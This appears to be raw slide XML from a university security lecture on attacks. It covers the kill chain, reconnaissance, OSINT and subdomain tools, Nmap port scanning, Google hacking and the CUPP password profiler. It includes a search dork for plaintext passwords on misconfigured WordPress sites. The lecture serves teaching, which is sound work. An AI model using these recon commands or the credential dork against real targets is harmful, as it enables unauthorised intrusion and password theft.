        <a:off x="4177897" y="2683"/>
        <a:ext cx="967962" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{149312C0-C957-49F9-BC52-7532C4D4544F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2858787" y="101948"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 16539455"/>
            <a:gd name="adj4" fmla="val 15870794"/>
            <a:gd name="adj5" fmla="val 439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19A38-AA77-4023-8E9D-00979E8A5AF7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1186" y="805160"/>
          <a:ext cx="2314573" cy="9258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DNS Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1186" y="805160"/>
        <a:ext cx="2083116" cy="925829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{520E3167-7DCA-45F4-8E3D-35C2F4E96D15}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1852845" y="805160"/>
          <a:ext cx="2314573" cy="9258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Trace / Route Mapping</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2315760" y="805160"/>
        <a:ext cx="1388744" cy="925829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{045FC462-FF4C-458A-812D-BB2FBA45C88C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3704504" y="805160"/>
          <a:ext cx="2314573" cy="9258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Enumerating the Edge</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4167419" y="805160"/>
        <a:ext cx="1388744" cy="925829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6F0FAC18-9360-49B4-83C9-3EE79CABF66A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5556163" y="805160"/>
          <a:ext cx="2314573" cy="9258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Scanning beyond Firewalls</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6019078" y="805160"/>
        <a:ext cx="1388744" cy="925829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D1A1A15E-12EF-441A-BDA0-6BEB9C219300}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7407821" y="805160"/>
          <a:ext cx="2314573" cy="9258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Life Host Discovery and Port Scanning</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7870736" y="805160"/>
        <a:ext cx="1388744" cy="9258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60D09-FBEB-AB49-81A0-6D0C0E36B268}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="727586" y="1369826"/>
          <a:ext cx="1211493" cy="137924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06804-05CE-A74E-AB8A-26B7ED1036E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406614" y="26861"/>
          <a:ext cx="2039442" cy="14275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Quick Port Scan</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="476313" y="96560"/>
        <a:ext cx="1900044" cy="1288145"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{325548CA-DB42-F84E-B93B-F75710B9E489}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2446056" y="163010"/>
          <a:ext cx="1483295" cy="1153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TCP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UDP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2446056" y="163010"/>
        <a:ext cx="1483295" cy="1153803"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F30BB8C0-4372-6F40-94DC-6BC302E148EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2418500" y="2973428"/>
          <a:ext cx="1211493" cy="137924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09EB4-AAE2-8F44-9F15-1C2872FB5EA1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2097528" y="1630463"/>
          <a:ext cx="2039442" cy="14275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Check for Blocking Controls (Firewalls)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2167227" y="1700162"/>
        <a:ext cx="1900044" cy="1288145"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{762A8BDE-5F06-4740-B595-13292BAAE40E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4136970" y="1766612"/>
          <a:ext cx="1483295" cy="1153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</dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4136970" y="1766612"/>
        <a:ext cx="1483295" cy="1153803"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A0DE1938-E58E-4640-AE1E-A3365638A212}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3788442" y="3234065"/>
          <a:ext cx="2039442" cy="14275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Full Port Scan and Service Enumeration</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3858141" y="3303764"/>
        <a:ext cx="1900044" cy="1288145"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BFD2C92E-CD3C-4744-B5ED-521B87883D1A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5827884" y="3370214"/>
          <a:ext cx="1483295" cy="1153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Nmap -p- -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2200" kern="1200" dirty="0" err="1"/>
            <a:t>sV</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2200" kern="1200" dirty="0"/>
            <a:t> host</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5827884" y="3370214"/>
        <a:ext cx="1483295" cy="1153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7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1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Reconnaissance: Research, identification, selection of targets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Harvesting email addresses, conference information etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Kann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> man noch in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Scanning, Enumeration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>aufteilen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: goal: create near complete profile of an organization’s security posture;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Ziel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: “Karte” der Assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Scanning: Inspecting the walls and doors and windows as potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>entrypoints</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Enumeration: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Weaponization: Pairing remote access malware with exploit into deliverable payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Coupling exploit with backdoor into deliverable payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Delivery: Transmission of weapon to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Delivering weaponized bundle to victim via email, web, USB etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploitation: Once delivered, weapon’s code triggered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploiting a vuln to execute code on victim’s system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Installation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>praktisch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> persistence, installing backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Installing malware on the asset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Command &amp; Control: Outside server communicates with weapons providing hands on keyboard access inside the target’s network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Command channel for remote manipulation of victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Actions on objective: with ‘hands on keyboard’ access, intruders accomplish their original goals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498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441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3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78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32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52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34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204700" h="6858000">
                <a:moveTo>
                  <a:pt x="12204192" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12204192" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1220419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6907" y="2523316"/>
            <a:ext cx="5763606" cy="4428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97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62843" y="5197737"/>
            <a:ext cx="6798214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49" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="005589"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="1802231">
              <a:lnSpc>
                <a:spcPts val="1503"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" spc="-20" smtClean="0"/>
              <a:pPr marL="1802231">
                <a:lnSpc>
                  <a:spcPts val="1503"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" spc="-2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803FE-B66A-E2D2-240B-5C71AF3007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603" y="535260"/>
            <a:ext cx="3058011" cy="70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66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75438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Wireless and Mobile Networks: 7-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3F96C-BB97-E1BE-9CF0-4EF0D386E2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603" y="535260"/>
            <a:ext cx="3058011" cy="70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iskiq.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cachedviews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hyperlink" Target="https://censys.io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zone-h.com/" TargetMode="Externa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://www.whatismyip.com/" TargetMode="Externa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://www.cyberhia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8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6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rsoft.net/" TargetMode="Externa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nmap.org/book/man-port-scanning-techniques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moviesite.com/dispatcher?action=profile&amp;id=1234567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hyperlink" Target="http://moviesite.com/dispatcher?action=profile&amp;id=%27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xkcd.com/327/" TargetMode="Externa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badguy.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnerable.com/welcome.php?name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hyperlink" Target="http://bank.com/transfer.do" TargetMode="Externa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heatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html#:~:text=The%20HTTP%20X%2DXSS%2DProtection,site%20scripting%20(XSS)%20attack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.mozilla.org/en-US/docs/Web/HTTP/CORS#the_http_response_headers" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freecodecamp.org/news/access-control-allow-origin-header-explained/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/shrutikapoor08/blogs/tree/master/code-examples/COR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ortswigger.net/web-security/ssrf" TargetMode="Externa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target.com/whatis/definition/Shodan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9D1110-9633-D320-6C31-583D2511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4" y="305509"/>
            <a:ext cx="11494227" cy="62058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39F0E3-8C0D-B9FB-C5FC-26F66EBAD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0137" y="3865069"/>
            <a:ext cx="5763606" cy="44281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Security – Session 6: Attacks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07C4BB-AF59-5A16-7633-E602C04000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431776" y="4766242"/>
            <a:ext cx="6698062" cy="2067233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="130175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prof. Dr.-Ing. Sebastian Schlesinger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130175" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Professor of Business Computer Science (Infrastructure &amp; Security)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C4B0E-AB6C-A87E-6FB8-832AC4F0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7269" y="305509"/>
            <a:ext cx="2947563" cy="6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821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1228-A7E7-511A-2630-110989F4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highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>MITRE Attack Framework Mitigations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01392-2DCC-A2A8-CCEB-93DA9CDC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161" y="643466"/>
            <a:ext cx="6257010" cy="55687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54AF-0630-9CC7-2731-D6BAA14FD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184" y="6356350"/>
            <a:ext cx="514349" cy="365125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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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4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6DED8-6B04-71E7-E13F-4D921E2BF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6F7F2-2AB7-82CC-0E42-C7298E70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/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reconnaissance / Information Gathering / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="560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352A7E-A1CC-ACC3-A8F4-771BF8A93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1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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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100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62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A45D-8E00-122C-F28B-A6D3B485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Reconnaissance and Information Gathering Activities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F1163-50FE-B1E3-DE38-BAD4E2F57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775EA-681E-3143-10AC-9FC696A94B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2127380"/>
            <a:ext cx="8697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search engines to gather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social networking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 Google hacking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 DNS interrogation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social engineering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55766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D70C-B92F-3A88-5C24-D734E68C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Intelligence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35DACD-F743-29AA-1D48-F2DEE17F9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C9E43-0E6C-4920-B817-E39E6962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5" y="1346443"/>
            <a:ext cx="9410701" cy="53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B1D6-7381-2667-0C7A-BC916BF9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err="1"/>
              <a:t>Footprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> - Gather Domain Information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D6C68-26D8-311A-4BC6-8DF98F0CD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7B877-131A-C6F7-332F-52F84AED394E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="363855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Sublist3r (apt install sublist3r, not preinstalled) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Python script that uses OSINT to enumerate subdomains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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo sublist3r -d ourtargetcompany.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0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Maltego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 creates graph of subdomains from public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theHarvester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 Python script to list all domains and IP addresses from public sources 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theHarvester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–d DOMAIN –b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749EA-3539-CBF2-7975-5FB89C34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291" y="1211563"/>
            <a:ext cx="5845305" cy="222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3DFA-D886-0176-A2DB-4F2AD303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OSINT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DB2DDC-FA11-D563-5FE9-4EBAEEC9B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11501-5976-9D12-3E5A-07B0278027A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1674674"/>
            <a:ext cx="66294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OSRFramework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(pip3 install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osrframework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 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subtools</a:t>
            </a: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Usufy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(e.g.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usufy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–n hwr-berlin.de) – lists all references from public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Mailfy</a:t>
            </a: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Searchfy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–n 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facebook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github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, Instagram, twitter,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youtube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Websites,e.g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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cachedviews.com/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 earlier dumps of internet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  <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://community.riskiq.com/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now Microsoft Defender Threat Intelligence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tinEye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 Image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Shodan.io  internet devices with additional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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://censys.io/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 similar</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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FE3-46FC-B207-FC9E-F7DE9EDB8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996" y="2228671"/>
            <a:ext cx="3444804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9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4687-B8F1-2C2F-1694-CA0C20EF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OSINT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8FC86-3A62-CE93-66AD-B0C3948E0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2B787-97C6-F6E7-1FAD-D8C514D493C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1369899"/>
            <a:ext cx="101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Spiderfoot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Python tool, crawls open source info, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>spiderfoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>IP:Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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C1E18-46F9-6D92-9E1F-D59FEE84D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898" y="1819616"/>
            <a:ext cx="5257216" cy="2337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2909C-81B2-CB88-F0F7-9979AD29B70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4365088"/>
            <a:ext cx="101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Google Hack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E28EF-CAD8-99B5-DF35-4BFAB668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80" y="4401567"/>
            <a:ext cx="2981515" cy="375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5405D-0FC6-4FEE-6633-2AE337FA5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006" y="4156966"/>
            <a:ext cx="5868219" cy="2133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7F7B68-B76D-881E-9B22-A3EC250E3E73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="496576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>
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example: search all plaintext passwords in poorly configured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> sites: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42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err="1">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/wp-content/uploads/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ext:txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "username" AND "password" | "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"pw"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28336E-8567-95E4-2A94-2685E53DC3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9219616" y="1627578"/>
            <a:ext cx="2609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https://www.googleguide.com/advanced_operators_reference.html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DF831F-8084-915A-A8BF-3F4D10BBC4E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9219616" y="2867465"/>
            <a:ext cx="2362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https://www.exploit-db.com/google-hacking-database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411609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0068-9D95-A29E-57F2-6E47BA52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OSINT – Security Breaches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6FE33-CB56-35D9-C0E9-4A7860521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5CB7D-FF02-AD62-CBC2-B255615C53E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2038350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Haveibeenpwned.com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Haveibeenzuckered.com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http://zone-h.com/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Findmypast.com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Common User Password Profiler (CUPP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cupp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 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cupp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
